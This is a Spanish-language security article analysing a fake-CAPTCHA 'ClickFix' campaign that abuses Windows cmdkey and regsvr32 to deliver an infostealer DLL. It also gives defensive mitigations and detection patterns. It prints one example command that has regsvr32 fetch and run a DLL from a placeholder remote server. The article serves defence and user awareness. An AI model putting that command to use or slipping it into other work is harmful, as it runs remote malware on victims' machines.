Campaña ClickFix: Malware que explota herramientas nativas de Windows

El panorama de la ciberseguridad en el segundo trimestre de 2026 se ha visto sacudido por el resurgimiento de una de las tácticas de ingeniería social más insidiosas y efectivas de los últimos años. La denominada Campaña ClickFix ha evolucionado drásticamente, dejando de lado los scripts de PowerShell —que ahora son detectados con relativa facilidad por las soluciones de seguridad modernas— para adoptar un enfoque mucho más quirúrgico y difícil de rastrear: el uso de binarios nativos del sistema operativo, conocidos técnicamente como Living-off-the-Land Binaries (LOLBins).

Esta nueva variante de la Campaña ClickFix, detectada con una actividad inusualmente alta a partir del 24 de abril de 2026, no busca explotar una vulnerabilidad técnica en el software, sino una “vulnerabilidad” en el comportamiento humano. Al disfrazarse de una verificación de seguridad legítima, como un CAPTCHA de Cloudflare o Google, los atacantes logran que sea el propio usuario quien ejecute la cadena de infección de forma manual, evadiendo así las capas de protección automatizadas que las empresas han implementado con tanto rigor.

La anatomía de la ingeniería social en la Campaña ClickFix

El éxito de la Campaña ClickFix reside en su capacidad para mimetizarse con los procesos cotidianos de navegación web. El ataque comienza cuando un usuario visita un sitio web comprometido o es redirigido a través de anuncios maliciosos (malvertising). En lugar de encontrar el contenido esperado, el navegador muestra una pantalla de error o un mensaje de “verificación de seguridad” que parece ser parte de la infraestructura de protección de la web.

El diseño es impecable. Utiliza logotipos actualizados, tipografías estándar de la industria y un lenguaje que imita a la perfección las notificaciones técnicas de proveedores de servicios en la nube. El mensaje suele indicar que, debido a un problema de conexión o una discrepancia en el navegador, el usuario debe realizar un “paso de verificación manual” para demostrar que es humano y así “reparar” (fix) la carga de la página. Es aquí donde reside el núcleo de la Campaña ClickFix.

El engaño del comando manual: Win+R

A diferencia de los ataques tradicionales de “un solo clic” donde el malware se descarga automáticamente, esta variante de la Campaña ClickFix instruye al usuario a realizar una serie de pasos específicos que, a ojos de un usuario promedio, parecen tareas de soporte técnico legítimas:

• Instrucción 1: Presionar la combinación de teclas Windows + R para abrir el cuadro de diálogo “Ejecutar”.
• Instrucción 2: Copiar un comando que aparece en la pantalla del navegador (supuestamente un “token de seguridad”).
• Instrucción 3: Pegar el comando en el cuadro de diálogo y presionar Enter.

Este método es extremadamente peligroso porque el comando se ejecuta bajo el contexto del usuario actual y no es filtrado por las protecciones del navegador web (como el sandboxing), ya que la ejecución ocurre directamente en el sistema operativo a petición del usuario. Al involucrar una acción física consciente, los sistemas de Endpoint Detection and Response (EDR) a menudo no clasifican la actividad como maliciosa de inmediato, asumiendo que es una acción legítima del administrador o del usuario final.

Análisis Técnico: El giro hacia los LOLBins (cmdkey y regsvr32)

Lo que realmente separa a la versión 2026 de la Campaña ClickFix de sus predecesoras es el abandono casi total de PowerShell en la fase inicial. Los actores de amenazas han comprendido que el monitoreo de PowerShell.exe es ahora una prioridad en cualquier centro de operaciones de seguridad (SOC). Por ello, han pivotado hacia herramientas nativas de Windows que suelen pasar desapercibidas bajo el radar de la mayoría de los motores de detección heurística.

El papel de cmdkey.exe

Uno de los componentes más sorprendentes de este ataque es el uso de cmdkey.exe. Tradicionalmente, esta utilidad se utiliza para crear, enumerar y eliminar nombres de usuario y contraseñas almacenados. En el contexto de la Campaña ClickFix, los atacantes utilizan cmdkey para preparar el entorno o, en versiones más avanzadas, para inyectar credenciales falsas que faciliten la conexión a servidores remotos a través de protocolos de red locales, evitando así que Windows solicite autenticación adicional cuando el sistema intente acceder al recurso malicioso.

La ejecución sigilosa mediante regsvr32.exe

El verdadero ejecutor de la carga útil es regsvr32.exe, una herramienta de línea de comandos de Windows que se usa habitualmente para registrar y anular el registro de controles OLE, como las bibliotecas de vínculos dinámicos (DLL). El comando proporcionado por el falso CAPTCHA de la Campaña ClickFix suele tener una estructura similar a esta:

regsvr32 /s /u /i:\\servidor-remoto\ruta\demo.dll scrobj.dll

Este comando es una obra maestra de la evasión por las siguientes razones:

1. Uso de rutas UNC: Al apuntar a una ruta de red (\\servidor-remoto\…), el sistema intenta cargar la DLL directamente desde un servidor controlado por el atacante a través del protocolo SMB o WebDAV, evitando que el archivo malicioso toque el disco duro local de forma convencional, lo que elude el escaneo de archivos estático.
2. Parámetro /i: Permite pasar una cadena opcional a la función DllInstall de la DLL, lo que puede ser aprovechado para ejecutar código arbitrario sin registrar realmente la DLL en el registro del sistema.
3. Abuso de scrobj.dll: Microsoft Script Component Runtime (scrobj.dll) se utiliza a menudo junto con regsvr32 para ejecutar scripts maliciosos (COM Scriptlets) que pueden descargar y ejecutar malware adicional en memoria.

El Payload: “demo.dll” y la persistencia de los Infostealers

El archivo final que se descarga en la Campaña ClickFix suele ser una biblioteca de 64 bits identificada frecuentemente como demo.dll. A pesar de su nombre genérico, este archivo es una pieza de malware altamente sofisticada, diseñada principalmente para funcionar como un Infostealer (ladrón de información) y un cargador de segunda etapa.

Una vez que demo.dll es cargado en la memoria del sistema por regsvr32, comienza a realizar una serie de actividades maliciosas diseñadas para comprometer tanto la privacidad del usuario como la seguridad de la red corporativa:

• Exfiltración de credenciales: El malware escanea los navegadores instalados (Chrome, Edge, Firefox) para extraer contraseñas guardadas, cookies de sesión y datos de autocompletado.
• Robo de billeteras de criptomonedas: Busca extensiones de navegador y archivos locales relacionados con carteras digitales.
• Recolección de tokens de sesión: Al robar cookies de sesión activas, los atacantes pueden saltarse la autenticación de dos factores (2FA) en servicios como Microsoft 365, AWS o Slack.
• Establecimiento de persistencia: El malware modifica claves de registro o crea tareas programadas para asegurar que, incluso si el proceso actual se detiene o el equipo se reinicia, el acceso de los atacantes se mantenga activo.

En el contexto corporativo, la Campaña ClickFix no se limita al robo de datos personales. Se ha observado que demo.dll actúa como una cabeza de playa, permitiendo que los atacantes realicen un reconocimiento de la red interna y desplieguen herramientas de movimiento lateral como Cobalt Strike, lo que eventualmente podría derivar en un ataque de ransomware a gran escala.

¿Por qué los sistemas de defensa tradicionales están fallando?

El desafío fundamental que plantea la Campaña ClickFix es la difuminación de la línea entre la actividad legítima y la maliciosa. Los antivirus tradicionales basados en firmas son inútiles contra esta amenaza porque la carga útil cambia constantemente (polimorfismo) y se sirve desde infraestructuras temporales.

Incluso los sistemas EDR más modernos enfrentan dificultades debido al factor humano. Cuando un usuario presiona Win+R y pega un comando, el sistema operativo interpreta que hay una intención explícita del propietario del dispositivo. A diferencia de un exploit que aprovecha un error en el desbordamiento de búfer, aquí no hay una anomalía técnica en el proceso de ejecución; el proceso regsvr32.exe es un binario firmado por Microsoft y está realizando su función nativa: cargar una biblioteca.

Además, el uso de rutas UNC para cargar la DLL a través de la red permite que el código malicioso se ejecute directamente en la RAM (ejecución “fileless” o sin archivos), lo que significa que no hay un rastro físico en el sistema de archivos tradicional que un escáner pueda detectar fácilmente.

Estrategias de Mitigación y Respuesta ante la Campaña ClickFix

Para combatir eficazmente la Campaña ClickFix, las organizaciones deben adoptar un enfoque de defensa en profundidad que combine controles técnicos estrictos con una educación continua del usuario.

1. Restricción de Binarios (AppLocker y WDAC)

La medida más efectiva es implementar políticas de AppLocker o Windows Defender Application Control (WDAC). Estas herramientas pueden configurarse para bloquear la ejecución de regsvr32.exe y cmdkey.exe por parte de usuarios estándar, o al menos restringir su capacidad para cargar bibliotecas desde rutas de red externas (UNC).

2. Monitoreo de Línea de Comandos

Es vital que los equipos de seguridad configuren el registro detallado de la línea de comandos (Evento 4688 de Windows). Las alertas deben dispararse siempre que se detecten patrones sospechosos asociados a la Campaña ClickFix, tales como:

• Uso de regsvr32.exe con el parámetro /i: apuntando a una dirección IP o ruta de red.
• Ejecución de procesos iniciados directamente desde el diálogo “Ejecutar” (explorador de archivos) que involucren herramientas administrativas.
• Conexiones salientes inusuales en los puertos 445 (SMB) o 80/443 iniciadas por binarios del sistema hacia direcciones externas no confiables.

3. Educación y Concientización del Usuario

Dado que la Campaña ClickFix depende enteramente de la manipulación psicológica, los programas de concientización deben actualizarse para incluir estos escenarios específicos. Los usuarios deben entender que ningún servicio legítimo (ya sea Google, Microsoft o Cloudflare) solicitará jamás que abran un cuadro de diálogo del sistema y peguen un comando manual para resolver un problema de navegación.

4. Segmentación de Red y Bloqueo de Protocolos

Bloquear el tráfico SMB saliente (puerto 445) hacia internet es una práctica recomendada que puede prevenir que el sistema intente cargar la DLL maliciosa desde el servidor del atacante. Asimismo, el uso de firewalls de próxima generación (NGFW) para inspeccionar el tráfico TLS en busca de patrones de comando y control (C2) asociados con infostealers es fundamental.

Conclusión: El futuro de la amenaza

La Campaña ClickFix representa una tendencia alarmante hacia ataques “asistidos por el usuario” que neutralizan gran parte de la inversión tecnológica en seguridad. Al abusar de la confianza y de las herramientas nativas de Windows como cmdkey y regsvr32, los atacantes han encontrado un camino de menor resistencia hacia el corazón de las redes corporativas.

En este escenario de 2026, la vigilancia ya no puede ser solo automática. La resiliencia cibernética frente a la Campaña ClickFix requiere una combinación de políticas de “Zero Trust” aplicadas a los binarios del sistema y una cultura organizacional donde la verificación de los procesos técnicos sea la norma, no la excepción. Solo mediante una visibilidad total sobre los procesos nativos y una defensa proactiva podremos mitigar el impacto de esta sofisticada evolución del fraude digital.